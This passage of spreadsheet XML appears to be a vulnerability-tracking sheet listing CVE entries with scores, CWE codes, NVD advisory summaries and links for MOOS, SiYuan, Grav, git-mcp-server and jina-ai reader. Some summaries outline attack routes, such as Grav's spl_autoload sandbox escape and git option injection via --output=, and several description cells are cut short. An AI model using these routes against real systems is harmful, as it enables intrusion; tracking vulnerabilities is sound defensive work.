          <t>MOOS-IvP uFldNodeComms through 24.8.1 trusts the source node identity from the message body rather than validating it from the connection source. Attackers can craft NODE_MESSAGE packets with spoofed source identities to impersonate other nodes and post arbitrary variable notifications without validation.</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85429</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85431</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through version 10.0.1 contains an unauthenticated UDP packet injection vulnerability in pMOOSBridge when configured with UDPListen. Attackers can send crafted UDP packets to the configured port to inject arbitrary variables into the local MOOS community with spoofed source and community identifiers.</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85431</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85436</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through 10.0.1 contains a buffer overflow vulnerability in CMOOSUDPLink::ReadPktFromArray() that allows remote attackers to corrupt heap memory by sending UDP datagrams with negative declared lengths. Attackers can send crafted UDP packets to the configured UDPListen port to trigger an oversized memcpy operation that writes past the destination buffer, causing heap corruption and denial of service.</t>
        </is>
      </c>
      <c r="S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85436</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85441</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate that serialized string lengths are non-negative in CMOOSMsg::operator&gt;&gt;. Unauthenticated attackers can send a crafted message with a negative length value to the MOOSDB port, causing an unhandled exception that terminates the database process.</t>
        </is>
      </c>
      <c r="S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85441</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85442</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate packet length declarations in CMOOSCommPkt::OnBytesWritten(), allowing unauthenticated attackers to trigger unbounded buffer allocation by sending crafted wire packets. Attackers can send packets with large declared lengths to exhaust server memory and cause denial of service before client authentication completes.</t>
        </is>
      </c>
      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85442</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85444</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP t</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85444</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85445</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains a denial of service vulnerability in the Demuxer::addMuxPacket() function that trusts the packet count declared in mux headers without validation. Attackers can declare arbitrarily large packet counts to trigger unbounded memory allocation, exhausting system resources and causing service unavailability.</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85445</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85446</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP versions through 24.8.1 contain a quadratic processing vulnerability in uFldNodeComms where each new node identity creates a ledger entry and triggers all-pairs distribution work. Attackers can supply unbounded distinct node names in reports to drive the shoreside broker into quadratic processing, delaying or preventing distribution of legitimate node reports.</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85446</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85447</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP p</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85447</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85449</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP p</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85449</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85450</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a denial of service vulnerability in the MOOSDB HTTP server that creates unbounded connections and threads without limits. Attackers can open many connections and send endless header data to exhaust server threads and memory, causing service unavailability.</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85450</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85452</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>MOOS ui-moos through 50b9c6c contains a buffer overflow vulnerability in ScopeTabPane.cpp and ScopeGrid.cpp where client and variable names are formatted into fixed 1024-byte buffers using sprintf without length validation. Attackers can supply arbitrarily long MOOS identifiers that overflow the buffers when an operator selects process list entries or pokes variables, enabling code execution.</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85452</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85540</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>DreamMaker developed by Interinfo has a SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands to read, modify, and delete database contents.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85540</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85584</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr"/>
      <c r="Q490" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a denial of service vulnerability in the publish-service Basic Auth throttle that stores failed-attempt state using attacker-controlled usernames without enforcing capacity limits or eviction policies. Unauthenticated attackers can submit repeated authentication requests with unique invalid usernames to exhaust memory and increase synchronization overhead, degrading service availability.</t>
        </is>
      </c>
      <c r="S490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85584</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85585</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr"/>
      <c r="Q491" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains an unbounded resource consumption vulnerability in the request-concurrency middleware that retains mutex entries for every unique request path without eviction. Unauthenticated attackers can send numerous unique request paths to permanently increase process memory and synchronization overhead, degrading availability.</t>
        </is>
      </c>
      <c r="S491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85585</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85604</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr"/>
      <c r="Q492" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.18 (affected versions &lt;= 2.0.17) contains a remote code execution vulnerability in the Twig sort filter. The sortFunc wrapper in GravExtension.php hardcodes Twig's isSandboxed argument to false, so unlike |map/|filter/|reduce, |sort accepts a plain function name inside the sandbox; the remaining denylist misses spl_autoload, which performs a PHP include. An authenticated user with only page-write rights (admin.pages or api.pages.write) can supply a crafted payload (e.g., via form frontmatter rendered by the Email plugin) that invokes spl_autoload through the sort filter, resulting in arbitrary PHP execution as the web server user.</t>
        </is>
      </c>
      <c r="S492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85604</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85626</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr"/>
      <c r="Q493" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>git-mcp-server 2.15.1 contains an argument injection vulnerability in the ref and object parameters of git_log, git_diff, and git_show tools that lack leading-dash validation. Attackers can inject git command-line options like --output= to write files outside the repository to arbitrary paths accessible by the process.</t>
        </is>
      </c>
      <c r="S493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85626</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85699</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr"/>
      <c r="Q494" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>jina-ai reader contains a server-side request forgery vulnerability where URL validation is performed only on the initial request but not re-applied to subsequent redirect hops. Attackers can craft a public URL that redirects to internal network addresses or cloud metadata endpoints, allowing the server to fetch and return the target's response body to the attacker.</t>
        </is>
      </c>
      <c r="S494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85699</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
